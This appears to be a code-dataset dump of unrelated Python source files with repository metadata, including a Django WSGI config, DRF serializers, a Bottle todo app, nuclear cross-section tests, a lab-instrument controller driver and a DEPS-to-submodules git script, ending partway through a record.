def cosine_learning_rate(current_step, max_steps, init_lr, final_lr):
"""Cosine annealing schedule for learning rate.
Parameters
----------
current_step : int
Current step in the optimization
max_steps : int
Total number of steps of the optimization.
init_lr : float
Initial learning rate.
final_lr : float
Final learning rate.
Returns
-------
float
The current learning rate.
"""
alpha = (1 + math.cos(math.pi * current_step / max_steps)) / 2
return final_lr + alpha * (init_lr - final_lr)
|
[
"adam.dziedzi@gmail.com"
] |
adam.dziedzi@gmail.com
|
732590f7535f493bc8add88cca06fc797937dc05
|
2874b52c0234d7e71031d4c22dedb3b24e539b2c
|
/backend/asetbeta_23682/wsgi.py
|
2ec019498b29468afbec180a22811cd744c8072d
|
[] |
no_license
|
crowdbotics-apps/asetbeta-23682
|
d81ed8125b8c2ebb12b43d25d8068ff9ca71e344
|
128708fff3c98680a239a0f198aed5937950c5bf
|
refs/heads/master
| 2023-02-12T09:51:04.507332
| 2021-01-14T14:38:53
| 2021-01-14T14:38:53
| 327,014,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
"""
WSGI config for asetbeta_23682 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "asetbeta_23682.settings")
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
55a35f079b434c08a95524dea40c0fc2846bb651
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2586/50263/236178.py
|
bd5fcad9a1a5d3b23ec8f4ae01903de54d954987
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
py
|
a = eval(input())
b = eval(input())
c = eval(input())
s = []
d1 = abs(b-a)
d2 = abs(c-b)
min_move = 0
max_move = d1+d2-2
if max_move != 0:
if min(d1,d2) < 3:
min_move = 1
else:
min_move = 2
s.append(min_move)
s.append(max_move)
print(s)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
4ef5375f46be6cb5c3ceb6cb0a70c7c7fcbb357c
|
b08870f8fe7b3cf1bbab3c52a7bacbb36ee1dcc6
|
/verp/patches/v13_0/update_custom_fields_for_shopify.py
|
40343f14221e3519c8ebba2228a7bb47f7871451
|
[] |
no_license
|
vsadminpk18/verpfinalversion
|
7148a64fe6134e2a6371470aceb1b57cc4b5a559
|
93d164b370ad9ca0dd5cda0053082dc3abbd20da
|
refs/heads/master
| 2023-07-13T04:11:59.211046
| 2021-08-27T06:26:48
| 2021-08-27T06:26:48
| 400,410,611
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
# Copyright (c) 2020, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from verp.verp_integrations.doctype.shopify_settings.shopify_settings import setup_custom_fields
def execute():
if frappe.db.get_single_value('Shopify Settings', 'enable_shopify'):
setup_custom_fields()
|
[
"admin@vespersolutions.tech"
] |
admin@vespersolutions.tech
|
8ee947a3381a57c428c551203de2c68479f20251
|
3c2eefd083f9b65ce7900ece4d9670b1130d65de
|
/bin/jwst_mtvt
|
f4721bd5bb4a607f58ea2c7fcf3b5246e11c8b8e
|
[] |
no_license
|
wkerzendorf/jwst_gtvt
|
ef1896fcee2f292715b36ec1a48c39b000098e48
|
55ee820d978858cbd6065c275d70680868916f58
|
refs/heads/master
| 2021-04-27T18:31:47.858747
| 2017-12-11T16:13:48
| 2017-12-11T16:13:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,613
|
#!/usr/bin/env python
import argparse
import sys
from jwst_gtvt.find_tgt_info import main, get_target_ephemeris
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='')
parser.add_argument('desg', nargs='+', help='Moving target designation.')
parser.add_argument('--smallbody', action='store_true', help='Set if the designation is that of a comet or asteroid. This is required for periodic comets with multiple orbit solutions in JPL/HORIZONS.')
parser.add_argument('--v3pa', help='Specify a desired V3 (telescope frame) Position Angle.')
parser.add_argument('--save_plot', help='Path of file to save plot output.')
parser.add_argument('--save_table', help='Path of file to save table output.')
parser.add_argument('--instrument', help='If specified plot shows only windows for this instrument. Options: nircam, nirspec, niriss, miri, fgs, v3 (case insensitive).')
parser.add_argument('--name', help='Target Name to appear on plots. Names with space should use double quotes e.g. "NGC 6240".')
parser.add_argument('--start_date', default='2018-01-01', help='Start date for visibility search in yyyy-mm-dd format. Earliest available is 2018-01-01.')
parser.add_argument('--end_date', default='2021-12-31', help='End date for visibility search in yyyy-mm-dd format. Latest available is 2021-12-31.')
args = parser.parse_args()
name, args.ra, args.dec = get_target_ephemeris(
' '.join(args.desg), args.start_date, args.end_date, smallbody=args.smallbody)
if args.name is None:
args.name = name
main(args, fixed=False)
|
[
"msk@astro.umd.edu"
] |
msk@astro.umd.edu
|
|
5a3af79325cecdb45f242a8ef34e72960f0eab7d
|
74ba13d19d6adb22149dbb8b17c0f4f1385ecfcb
|
/src/packet_factory.py
|
a8cbc3435b4d71956d4707aa482a5b5f794a5f04
|
[
"MIT"
] |
permissive
|
aenon/Melkweg
|
2d6e7a2d6cd29c0bc9e246b65c0d042d9c73ad13
|
d3adcc615ede1fad116c9c50ed0609a6b1a55250
|
refs/heads/master
| 2021-05-07T08:20:16.005318
| 2017-11-02T16:46:34
| 2017-11-02T16:46:34
| 108,594,644
| 0
| 0
| null | 2017-10-27T20:53:01
| 2017-10-27T20:53:01
| null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
#coding=utf-8
from packet_pb2 import MPacket
from cipher import nonce
class PacketFlag(object):
DATA = 1
LIV = 2
RST = 3
FIN = 4
KILL = 5
class PacketFactory(object):
@classmethod
def create_syn_packet(self, iv):
packet = MPacket()
packet.iv = iv
return packet
@classmethod
def create_rst_packet(self, port):
packet = MPacket()
packet.port = port
packet.flags = PacketFlag.RST
return packet
@classmethod
def create_kill_packet(self):
packet = MPacket()
packet.flags = PacketFlag.KILL
return packet
@classmethod
def create_data_packet(self, port, data):
packet = MPacket()
packet.flags = PacketFlag.DATA
packet.port = port
packet.data = data
return packet
@classmethod
def create_fin_packet(self, port):
packet = MPacket()
packet.flags = PacketFlag.FIN
packet.port = port
return packet
|
[
"mail.kuuy@gmail.com"
] |
mail.kuuy@gmail.com
|
b4d2b444b5df8f4145c1988f40a94af4842b1109
|
d02c92f1fc6910b1a9c5e6823e689b32567e41a6
|
/practica_2/polls_proj/polls_app/serializers.py
|
42363486667c10bb144a77c72a2eafa87cddeed8
|
[] |
no_license
|
eflipe/Django-REST
|
6c1050bf9f46e88a7639d103a629f96d59a797bf
|
110072f282e8fe9852e8bf6ae6e5660aa0e80d64
|
refs/heads/master
| 2023-08-05T11:58:41.691221
| 2020-08-05T23:23:34
| 2020-08-05T23:23:34
| 282,772,802
| 0
| 0
| null | 2023-07-24T00:26:28
| 2020-07-27T02:15:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,152
|
py
|
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Poll, Choice, Vote
from rest_framework.authtoken.models import Token
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('username', 'email', 'password')
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User(
email=validated_data['email'],
username=validated_data['username']
)
user.set_password(validated_data['password'])
user.save()
Token.objects.create(user=user)
return user
class VoteSerializer(serializers.ModelSerializer):
class Meta:
model = Vote
fields = '__all__'
class ChoiceSerializer(serializers.ModelSerializer):
votes = VoteSerializer(many=True, required=False)
class Meta:
model = Choice
fields = '__all__'
class PollSerializer(serializers.ModelSerializer):
choices = ChoiceSerializer(many=True, read_only=True, required=False)
class Meta:
model = Poll
fields = '__all__'
|
[
"felipecabaleiro@gmail.com"
] |
felipecabaleiro@gmail.com
|
95c0226e3f29a6fd7317200273f0e0fb0a7695ca
|
f642c054451aa3c87bb18fa63037eea0e6358bda
|
/algo/longestStringInArray_CanBeMadeFromotherStrings.py
|
33d9cb3ae354d688e4da4d8c1b61436bc258fc5d
|
[] |
no_license
|
devendraprasad1984/python
|
30f3a539e92be13d893246ad28a42907457a38d5
|
0f1badabba07fbe7f5f792b7e543c0748eecd6c7
|
refs/heads/master
| 2023-07-21T08:22:45.193077
| 2021-08-27T15:09:28
| 2021-08-27T15:09:28
| 254,812,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
"""
"""
arr=["geeks","for","geeksgeeks","geeksfor","geeksforgeeks"]
maxStr=sorted(arr,key=lambda x:-len(x))[0]
print(arr,maxStr)
found=False
for x in arr:
for y in arr:
if maxStr!=x and maxStr!=y:
# print(x+y)
if x+y==maxStr:
found=True
print("max string",maxStr,"is possible to built from parts of arrays",x,y)
break
if not found:
print("max string",maxStr,"is not possible to built from parts of arrays")
|
[
"devendraprasad1984@gmail.com"
] |
devendraprasad1984@gmail.com
|
7537b54bab44dc8f46b1c1c38c0d6b02d131616e
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/public_hand_or_big_woman.py
|
a6465a3098d82b969e3ffb571a87aeeb368e3bf7
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
#! /usr/bin/env python
def be_next_work(str_arg):
week(str_arg)
print('woman_or_time')
def week(str_arg):
print(str_arg)
if __name__ == '__main__':
be_next_work('year')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
958d10213b2c05b768ced6c6cda03fb7c7d10b0b
|
bdc10ba57424040129cc72ad018ff26bc8bca66a
|
/ConfigDefinitions/BranchAdditions/UserDefinedBranches/Triggers_18_MC.py
|
fa59a97a8c09e3b16d9403906e1fd565dd4e9943
|
[] |
no_license
|
aloeliger/Jesterworks
|
61e0ac38ca325fefbbd8ccedaa8eb02d8a76ebbe
|
96a22bac4ce20b91aba5884eb0e5667fcea3bc9a
|
refs/heads/master
| 2021-06-09T15:39:06.976110
| 2021-04-23T11:25:06
| 2021-04-23T11:25:06
| 157,698,363
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,383
|
py
|
import ConfigDefinitions.BranchAdditions.BranchDef as Branch
def CalculateTrigger24(TheBranch,TheChain):
if (TheChain.passMu24 and TheChain.matchMu24_1
and TheChain.filterMu24_1 and TheChain.pt_1 > 25.0):
TheBranch.BranchValue[0]=1.0
else:
TheBranch.BranchValue[0]=0.0
def CalculateTrigger27(TheBranch,TheChain):
if(TheChain.passMu27 and TheChain.matchMu27_1
and TheChain.filterMu27_1 and TheChain.pt_1 > 25.0):
TheBranch.BranchValue[0]=1.0
else:
TheBranch.BranchValue[0]=0.0
def CalculateTrigger2027(TheBranch,TheChain):
if (TheChain.passMu20HPSTau27
and TheChain.matchMu20HPSTau27_1
and TheChain.matchMu20HPSTau27_2
and TheChain.pt_1 > 21 and TheChain.pt_1 < 25
and TheChain.pt_2 > 32
and abs(TheChain.eta_1) < 2.1
and abs(TheChain.eta_2) < 2.1
and TheChain.filterMu20HPSTau27_1
and TheChain.filterMu20HPSTau27_2):
TheBranch.BranchValue[0] = 1.0
else:
TheBranch.BranchValue[0] = 0.0
Trigger24 = Branch.UserBranch()
Trigger24.Name = "Trigger24"
Trigger24.CalculateValue = CalculateTrigger24
Trigger27 = Branch.UserBranch()
Trigger27.Name = "Trigger27"
Trigger27.CalculateValue = CalculateTrigger27
Trigger2027 = Branch.UserBranch()
Trigger2027.Name = "Trigger2027"
Trigger2027.CalculateValue = CalculateTrigger2027
|
[
"aloelige@cern.ch"
] |
aloelige@cern.ch
|
f7543e5d841ceb31ee2674b563c1e772576e185c
|
366b2ff9cd498808438bf7c48f697c05b361d02c
|
/app.py
|
afd82cb98a6734228c58e3cf1b2d768b487eb5e6
|
[] |
no_license
|
c-bata/AngularJS-Bottle-TodoApp
|
1aef6b09fd85fabaa63898ab3fb9a2d586216b93
|
8f03820b7949b0c28477970c58f25ccd1856b2a9
|
refs/heads/master
| 2021-03-12T22:40:32.000758
| 2015-11-04T11:14:47
| 2015-11-04T11:14:47
| 38,732,944
| 2
| 0
| null | 2015-11-04T11:11:39
| 2015-07-08T05:02:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,290
|
py
|
from bottle import (
route, response, run, template, static_file, install, post, request
)
import json
import os
import jsonschema
import models
import schemas
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(BASE_DIR, 'static')
install(models.plugin)
@route('/')
def index():
return template('tasks')
@route('/api/tasks')
def tasks(db):
response.content_type = 'application/json'
tasks = [task.serialize for task in db.query(models.Task).all()]
return json.dumps({'tasks': tasks})
@post('/api/tasks')
def create_task(db):
response.content_type = 'application/json'
try:
jsonschema.validate(request.json, schemas.task_schema)
task = models.Task(title=request.json['title'])
db.add(task)
db.commit() # ここでコミットしないとidとかdefault値を返せない
return json.dumps(task.serialize)
except jsonschema.ValidationError:
response.status_code = 400
return json.dumps({
'error': {'message': 'Validation is failed...'}
})
@route('/static/<filename:path>')
def send_static(filename):
return static_file(filename, root=STATIC_DIR)
if __name__ == '__main__':
run(host='localhost', port=8080, debug=True, reloader=True)
|
[
"contact@c-bata.link"
] |
contact@c-bata.link
|
bbe8129b09d85cd20a4dcbad5bcd0f14703eb61a
|
ae79aa8458230fe2331b267308a29adff215bbfe
|
/armi/nuclearDataIO/tests/test_xsCollections.py
|
9088f3c05a114f56505279c386786363dec4e6f4
|
[
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] |
permissive
|
paulromano/armi
|
3727cf3c52de5e412e8db4d5bf5d9998a720616c
|
6c4fea1ca9d256a2599efd52af5e5ebe9860d192
|
refs/heads/master
| 2023-01-10T05:43:27.691791
| 2020-08-07T00:33:35
| 2020-08-07T00:33:35
| 285,824,692
| 1
| 0
|
Apache-2.0
| 2020-08-07T12:32:54
| 2020-08-07T12:32:53
| null |
UTF-8
|
Python
| false
| false
| 3,832
|
py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module that tests methods within xsCollections
"""
import unittest
from armi.nuclearDataIO import xsCollections
from armi import nuclearDataIO
from armi.tests import ISOAA_PATH
from armi.physics.neutronics.tests import test_cross_section_manager
class TestXsCollections(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.microLib = nuclearDataIO.ISOTXS(ISOAA_PATH)
def setUp(self):
self.mc = xsCollections.MacroscopicCrossSectionCreator()
self.block = test_cross_section_manager.MockBlock()
self.block.setNumberDensity("U235", 0.02)
self.block.setNumberDensity("FE", 0.01)
def test_generateTotalScatteringMatrix(self):
"""Generates the total scattering matrix by summing elastic, inelastic, and n2n scattering matrices."""
nuc = self.microLib.nuclides[0]
totalScatter = nuc.micros.getTotalScatterMatrix()
self.assertAlmostEqual(
totalScatter[0, 0],
(
nuc.micros.elasticScatter[0, 0]
+ nuc.micros.inelasticScatter[0, 0]
+ 2.0 * nuc.micros.n2nScatter[0, 0]
),
)
def test_generateTotalScatteringMatrixWithMissingData(self):
"""
Generates the total scattering matrix by summing elastic and n2n scattering matrices.
Notes
-----
This tests that the total scattering matrix can be produced when the inelastic scattering matrix is not defined.
"""
nuc = self.microLib.nuclides[0]
nuc.micros.inelasticScatter = None
totalScatter = nuc.micros.getTotalScatterMatrix()
self.assertAlmostEqual(
totalScatter[0, 0],
(nuc.micros.elasticScatter[0, 0] + 2.0 * nuc.micros.n2nScatter[0, 0]),
)
def test_createMacrosFromMicros(self):
self.mc.createMacrosFromMicros(self.microLib, self.block)
totalMacroFissionXs = 0.0
totalMacroAbsXs = 0.0
for nuc, density in self.mc.densities.items():
nuclideXS = self.mc.microLibrary.getNuclide(nuc, "AA")
for microXs in nuclideXS.micros.fission:
totalMacroFissionXs += microXs * density
for microXsName in xsCollections.ABSORPTION_XS:
for microXs in getattr(nuclideXS.micros, microXsName):
totalMacroAbsXs += microXs * density
self.assertAlmostEqual(sum(self.mc.macros.fission), totalMacroFissionXs)
self.assertAlmostEqual(sum(self.mc.macros.absorption), totalMacroAbsXs)
def test_collapseCrossSection(self):
"""
Tests cross section collapsing
Notes
-----
The expected 1 group cross section was generated by running the collapse cross section method. This tests
that this method has not been modified to produce a different result.
"""
expected1gXs = 2.35725262208
micros = self.microLib["U235AA"].micros
flux = list(reversed(range(33)))
self.assertAlmostEqual(
micros.collapseCrossSection(micros.nGamma, flux), expected1gXs
)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'TestXsCollections.test_generateTotalScatteringMatrix']
unittest.main()
|
[
"ntouran@terrapower.com"
] |
ntouran@terrapower.com
|
699ea1d33083dbe690ac1495e2b02345c3ab0360
|
9a1538123b8abec14410dad46c437cf735684dd9
|
/news/migrations/0001_initial.py
|
552caaeb8e0ba8c9555709ab96355304db3f721e
|
[] |
no_license
|
asmuratbek/zastroy24
|
deec6bd65229aeb29eb313d915c6c47ca036a8aa
|
d68ce21beefc644752a1271a4d8981cd2423afba
|
refs/heads/master
| 2020-04-27T18:44:26.845151
| 2019-03-08T18:09:13
| 2019-03-08T18:09:13
| 174,585,168
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,000
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-01 14:58
from __future__ import unicode_literals
import ckeditor_uploader.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_active', models.BooleanField(default=True, verbose_name='\u0410\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u043d\u043e\u0432\u043e\u0441\u0442\u044c?')),
('title', models.CharField(help_text='\u041e\u043d \u0436\u0435 \u0438 meta_title', max_length=255, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438')),
('slug', models.CharField(help_text='\u041d\u0443\u0436\u0435\u043d \u0434\u043b\u044f URL', max_length=255, verbose_name='slug')),
('preview', models.ImageField(blank=True, null=True, upload_to='news/', verbose_name='\u041f\u0440\u0435\u0434\u043e\u0441\u043c\u043e\u0442\u0440 \u043d\u043e\u0432\u043e\u0441\u0442\u0438')),
('content', ckeditor_uploader.fields.RichTextUploadingField(verbose_name='\u0422\u0435\u043b\u043e \u043d\u043e\u0432\u043e\u0441\u0442\u0438')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f')),
],
options={
'verbose_name': '\u043d\u043e\u0432\u043e\u0441\u0442\u044c',
'verbose_name_plural': '\u041d\u043e\u0432\u043e\u0441\u0442\u0438',
},
),
]
|
[
"asmuratbek@gmail.com"
] |
asmuratbek@gmail.com
|
9e02f1f5e378de2d29593ff5b0c7234dc46017ae
|
ff81a9d7880f1b85a1dc19d5eba5ac72d7179c86
|
/pychron/hardware/apis_controller.py
|
3f9007cdfd86fd568ce9d3cbf6a0909680c9efef
|
[
"Apache-2.0"
] |
permissive
|
UManPychron/pychron
|
2fb7e479a9f492423c0f458c70102c499e1062c4
|
b84c9fd70072f9cbda30abe2c471e64fe3dd75d8
|
refs/heads/develop
| 2022-12-03T23:32:45.579326
| 2020-01-29T19:02:20
| 2020-01-29T19:02:20
| 36,100,637
| 0
| 0
| null | 2015-05-23T00:10:06
| 2015-05-23T00:10:05
| null |
UTF-8
|
Python
| false
| false
| 5,881
|
py
|
# ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import time
from traits.api import Property, provides
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.hardware.actuators.iactuator import IActuator
from pychron.hardware.core.core_device import CoreDevice
CMD_MAP = {'list_blanks': '100',
'list_airs': '101',
'last_runid': '102',
'pipette_record': '103',
'status': '104',
'load_blank': '105',
'load_air': '106',
'cancel': '107',
'set_external_pumping': '108'}
STATUS_MAP = {'0': 'Idle',
'1': 'Pumping pipette',
'2': 'Loading pipette',
'3': 'Expanding pipettes',
'4': 'Expansion complete'}
@provides(IActuator)
class ApisController(CoreDevice):
connection_url = Property
# close `isolation_valve` `isolation_delay` seconds after loading of pipette started
isolation_delay = 25
# name of valve to make analytical section static
isolation_valve = 'U'
isolation_info = 'isolate microbone'
# instead of the simple wait/close sequence use the a gosub
# use this for a more complex/flexible pattern i.e open/close multiple valves
isolation_gosub = None
def load_additional_args(self, config):
v = self.config_get(config, 'Isolation', 'valve', optional=False, default='U')
self.isolation_delay = self.config_get(config, 'Isolation', 'delay', optional=False, cast='int', default=25)
self.isolation_info = self.config_get(config, 'Isolation', 'info', optional=True)
self.isolation_gosub = self.config_get(config, 'Isolation', 'gosub', optional=True)
self.isolation_valve = v.replace('"', '').replace("'", '')
return True
#iacuator protocol
def close_channel(self, obj):
self.set_external_pumping(False)
return True
def open_channel(self, obj):
self.set_external_pumping(True)
return True
def get_channel_state(self, obj):
pass
def get_lock_state(self, obj):
pass
def script_loading_block(self, script, **kw):
"""
wait for script loading to complete.
this process has three steps.
1. wait for loading to start. status changes from 1 to 2
2. if isolation_gosub
do gosub
else
wait `isolation_delay` seconds then close the `isolation valve`
3. wait for apis script to complete
return True if completed successfully
"""
script.console_info('waiting for pipette to load')
if not self.blocking_poll('loading_started', script=script, **kw):
return
script.console_info('loading started')
if self.isolation_gosub:
self.debug('executing isolation gosub= {}'.format(self.isolation_gosub))
script.gosub(self.isolation_gosub)
else:
ws = self.isolation_delay
self.debug('wait {}s'.format(ws))
time.sleep(ws)
if self.isolation_info:
script.console_info(self.isolation_info)
iv = self.isolation_valve
iv=iv.split(',')
for v in iv:
script.close(v.strip())
script.console_info('wait for apis to complete expansion')
return self.blocking_poll('get_loading_complete', script=script, **kw)
def make_command(self, cmd):
try:
return CMD_MAP[cmd]
except KeyError:
return 'invalid command cmd={}'.format(cmd)
def load_blank(self, name):
cmd = self.make_command('load_blank')
self.ask('{},{}'.format(cmd, name))
def load_pipette(self, name):
cmd = self.make_command('load_air')
self.ask('{},{}'.format(cmd, name))
def get_status(self):
cmd = self.make_command('status')
status = self.ask(cmd)
return status
def get_loading_status(self):
status = self.get_status()
try:
status = STATUS_MAP[status]
return status
except KeyError:
pass
def loading_started(self):
status = self.get_loading_status()
return status == 'Loading pipette'
def get_loading_complete(self):
status = self.get_loading_status()
return status == 'Expansion complete'
def get_available_blanks(self):
cmd = self.make_command('list_blanks')
return self.ask(cmd)
def get_available_airs(self):
cmd = self.make_command('list_airs')
return self.ask(cmd)
def set_external_pumping(self, state):
cmd = self.make_command('set_external_pumping')
cmd = '{},{}'.format(cmd, 'true' if state else 'false')
return self.ask(cmd)
def _get_connection_url(self):
return '{}:{}'.format(self.communicator.host, self.communicator.port)
# ============= EOF =============================================
|
[
"jirhiker@gmail.com"
] |
jirhiker@gmail.com
|
59f35ce862fba5572d3fa349af79c857f80998f2
|
5b7af6548668085da9a6ab86f564538ee73c4865
|
/build/scripts/slave/recipe_modules/sync_submodules/resources/deps2submodules.py
|
7596609ca687bffb82ee3c78743d82aa56d0c70d
|
[
"BSD-3-Clause"
] |
permissive
|
elastos/Elastos.APP.Android.ShiJiuTV
|
463a986450a915f7b3066e6a03aca903cf56f69b
|
f77189a2b8df86028adc68105988710d16ce012b
|
refs/heads/master
| 2023-03-18T03:11:58.337349
| 2018-03-12T08:50:57
| 2018-03-13T11:10:27
| 124,007,751
| 0
| 1
| null | 2022-10-03T03:30:29
| 2018-03-06T02:21:25
| null |
UTF-8
|
Python
| false
| false
| 5,186
|
py
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Read DEPS and use the information to update git submodules"""
import argparse
import logging
import os
import re
import subprocess
import sys
from deps_utils import GetDepsContent
SHA1_RE = re.compile(r'[0-9a-fA-F]{40}')
SHA1_REF_RE = re.compile(r'^([0-9a-fA-F]{40})\s+refs/[\w/]+\s*')
def SanitizeDeps(submods, path_prefix):
"""
Look for conflicts (primarily nested submodules) in submodule data. In the
case of a conflict, the higher-level (shallower) submodule takes precedence.
Modifies the submods argument in-place.
"""
ret = {}
for name, value in submods.iteritems():
if not name.startswith(path_prefix):
logging.warning('Dropping submodule "%s", because it is outside the '
'working directory "%s"', name, path_prefix)
continue
# Strip the prefix from the submodule name.
name = name[len(path_prefix):]
parts = name.split('/')[:-1]
while parts:
may_conflict = '/'.join(parts)
if may_conflict in submods:
logging.warning('Dropping submodule "%s", because it is nested in '
'submodule "%s"', name, may_conflict)
break
parts.pop()
ret[name] = value
return ret
def CollateDeps(deps_content):
"""
Take the output of deps_utils.GetDepsContent and return a hash of:
{ submod_name : [ [ submod_os, ... ], submod_url, submod_sha1 ], ... }
"""
spliturl = lambda x: list(x.partition('@')[0::2]) if x else [None, None]
submods = {}
# Non-OS-specific DEPS always override OS-specific deps. This is an interim
# hack until there is a better way to handle OS-specific DEPS.
for (deps_os, val) in deps_content[1].iteritems():
for (dep, url) in val.iteritems():
submod_data = submods.setdefault(dep, [[]] + spliturl(url))
submod_data[0].append(deps_os)
for (dep, url) in deps_content[0].iteritems():
submods[dep] = [['all']] + spliturl(url)
return submods
def WriteGitmodules(submods):
"""
Take the output of CollateDeps, use it to write a .gitmodules file and
return a map of submodule name -> sha1 to be added to the git index.
"""
adds = {}
with open('.gitmodules', 'w') as fh:
for name, (os, url, sha1) in sorted(submods.iteritems()):
if not url:
continue
if url.startswith('svn://'):
logging.warning('Skipping svn url %s', url)
continue
print >> fh, '[submodule "%s"]' % name
print >> fh, '\tpath = %s' % name
print >> fh, '\turl = %s' % url
print >> fh, '\tos = %s' % ','.join(os)
if not sha1:
sha1 = 'master'
# Resolve the ref to a sha1 hash.
if not SHA1_RE.match(sha1):
if sha1.startswith('origin/'):
sha1 = sha1[7:]
output = subprocess.check_output(['git', 'ls-remote', url, sha1])
match = SHA1_REF_RE.match(output)
if not match:
logging.warning('Could not resolve ref %s for %s', sha1, url)
continue
logging.info('Resolved %s for %s to %s', sha1, url, match.group(1))
sha1 = match.group(1)
logging.info('Added submodule %s revision %s', name, sha1)
adds[name] = sha1
subprocess.check_call(['git', 'add', '.gitmodules'])
return adds
def RemoveObsoleteSubmodules():
"""
Delete from the git repository any submodules which aren't in .gitmodules.
"""
lsfiles = subprocess.check_output(['git', 'ls-files', '-s'])
for line in lsfiles.splitlines():
if not line.startswith('160000'):
continue
_, _, _, path = line.split()
cmd = ['git', 'config', '-f', '.gitmodules',
'--get-regexp', 'submodule\..*\.path', '^%s$' % path]
try:
with open(os.devnull, 'w') as nullpipe:
subprocess.check_call(cmd, stdout=nullpipe)
except subprocess.CalledProcessError:
subprocess.check_call(['git', 'update-index', '--force-remove', path])
def main():
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('--path-prefix',
default=os.path.basename(os.getcwd()) + '/',
help='Ignore any dep outside this prefix. DEPS files can '
"specify dependencies in the repo's parent directory, "
'so the default here is to ignore anything outside the '
"current directory's basename")
parser.add_argument('deps_file', default='DEPS', nargs='?')
options = parser.parse_args()
if not options.path_prefix.endswith('/'):
parser.error("--path-prefix '%s' must end with a '/'" % options.path_prefix)
adds = WriteGitmodules(
SanitizeDeps(
CollateDeps(GetDepsContent(options.deps_file)),
options.path_prefix))
RemoveObsoleteSubmodules()
for submod_path, submod_sha1 in adds.iteritems():
subprocess.check_call(['git', 'update-index', '--add',
'--cacheinfo', '160000', submod_sha1, submod_path])
return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"xiaokun.mengxk@qcast.cn"
] |
xiaokun.mengxk@qcast.cn
|
06eab32812567f359d7aea988deb216e87b8b3e1
|
d114a6576659a4a299f5965032489d2abbe41282
|
/src/computer_vision/nodes/synchronize_img_command_lidar.py
|
9c7be96b236672ac1cb80aa900f9db16b72f267c
|
[
"MIT"
] |
permissive
|
mldiego/Platooning-F1Tenth
|
dbc23ff7af3397716be1bbfdf9881da799206855
|
